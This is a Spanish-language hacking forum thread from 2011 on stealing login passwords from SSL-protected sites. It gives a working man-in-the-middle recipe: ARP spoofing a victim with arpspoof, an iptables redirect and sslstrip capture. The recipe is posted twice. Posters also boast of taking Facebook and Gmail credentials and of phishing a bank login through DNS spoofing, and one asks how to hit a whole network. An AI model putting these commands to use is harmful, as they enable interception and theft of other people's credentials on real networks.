Ettercap - Contraseña SSL - Cual es mejor forma?

Iniciado por SokarTefnut, 6 Marzo 2011, 22:23 PM

0 Miembros y 2 Visitantes están viendo este tema.

SokarTefnut

Hola a todos, llevo poco tiempo en el mundo del Hacking,y me doy cuenta de que cuanto mas estudio, mas parece quedarme por aprender.

Tras analizar con Wireshark el trafico generado por cierta pagina web de entrada de usuario y contraseña, observo que utiliza el protocolo SSL, haciendo ARP-Spoof con Ettercap,éste no parece ser capaz de descifrar éste protocolo,aunque he leido que Ettercap es capaz.

Mi pregunta es si alguien sabe el procedimiento,o que pluggin es necesario para conseguirlo.
Lo he intentado desde Windows, y desde Linux,con BackTrack, pero ni en modo consola lo he logrado.
Gracias por cualquier ayuda o sugerencia.
"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond

y0g-s0th0th

con ettercap podes pero el certificado q genera, al ser falso, causa una alerta en el navegador del objetivo. lo mejor es usar sslstrip.


saludos
Para invocar a Yog-Sothoth habrás de esperar a que el sol penetre en la quinta mansión, con Saturno en trino; luego has de trazar el pentáculo de fuego, recitando el noveno verso tres veces; y, repitiéndolo todos los años cuando la Noche del árbol de Mayo y en la de Difuntos, harás que el Ser se engendre en los Espacios Exteriores, más allá de la puerta que custodia Yog-Sothoth.

SokarTefnut

#2
Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
    (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
    manera,estaremos transparentes para la victima,que podrá logearse
    sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo



"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond

y0g-s0th0th

si, creo q esta todo. si tenes problemas avisa q tengo algun tuto armado x ahi.


saludos
Para invocar a Yog-Sothoth habrás de esperar a que el sol penetre en la quinta mansión, con Saturno en trino; luego has de trazar el pentáculo de fuego, recitando el noveno verso tres veces; y, repitiéndolo todos los años cuando la Noche del árbol de Mayo y en la de Difuntos, harás que el Ser se engendre en los Espacios Exteriores, más allá de la puerta que custodia Yog-Sothoth.

SokarTefnut

No logro capturar nada, ni con el procedimiento explicado anteriormente, el archivo de captura se crea, pero siempre queda vacio, algo falla.

El ARP spoofing funciona correctamente, si miro la caché ARP de la víctima, me aparecen las MAC direccionadas hacia la maquina atacante, tanto ésta como el server.

¿ No es necesario direccionar el SSLSTRIP hacia la interfaz de red en uso ? (En mi caso eth0)
"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond

y0g-s0th0th

no, asi deberia funcionar. seguro q haces bien el envenenamiento?

con ettercap q te pasaba? capturabas bien passes de texto plano? proba con ettercap sino en lugar de arpspoof a ver q pasa.


saludos
Para invocar a Yog-Sothoth habrás de esperar a que el sol penetre en la quinta mansión, con Saturno en trino; luego has de trazar el pentáculo de fuego, recitando el noveno verso tres veces; y, repitiéndolo todos los años cuando la Noche del árbol de Mayo y en la de Difuntos, harás que el Ser se engendre en los Espacios Exteriores, más allá de la puerta que custodia Yog-Sothoth.

valdomero

Hola.
He probado el backtrack 4 y usado el sslstrip consiguiendo sacar mi clave . Lo que ocurre es que cuando entro en el correo de forma directa ( sin meter la contraseña ) solo consigo ver el correo pero no la clave. Hay alguna forma de interpretar los datos cifrados que me aparecen en el sslstrip.
Saludos

EvilGoblin

En el logeo automatico puede que se dirija directamente con https://

Lo que puedes hacer es matar ese proceso, (cortar la comunicacion)

para que tenga que volverse a conectar.

yo lo probe con facebook, gmail y otras cuentas y funciona lo mas bien.


con cuentas de banco (ejem: visa) no logre que funcione. directamente tiene que ser si o si https: certificado por ellos.

la unica forma es DNSarp. crear una pagina falsa y redirigir el trafico a tu pagina (si solicita visa en este caso)

asi si lo logre, pero no logre que se vea bien la pagina xD :P pero es safable.
Experimental Serial Lain [Linux User]

valdomero

#8
gracias EvilGoblin
He usado este comando /etc/rc.d/init.d/network restart , pero no he conseguido nada, claro que puede ser porque unos de los pc tiene windows. Si es por eso cual seria el comando en linux para reiniciar la conexion en mi torre que tiene xp
Saludos

xexudj89

Cita de: SokarTefnut en  7 Marzo 2011, 11:06 AM
Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
    (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
    manera,estaremos transparentes para la victima,que podrá logearse
    sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo





se podria hacer para que lo haga con toda la red a la vez o solo se puede con un pc a la vez??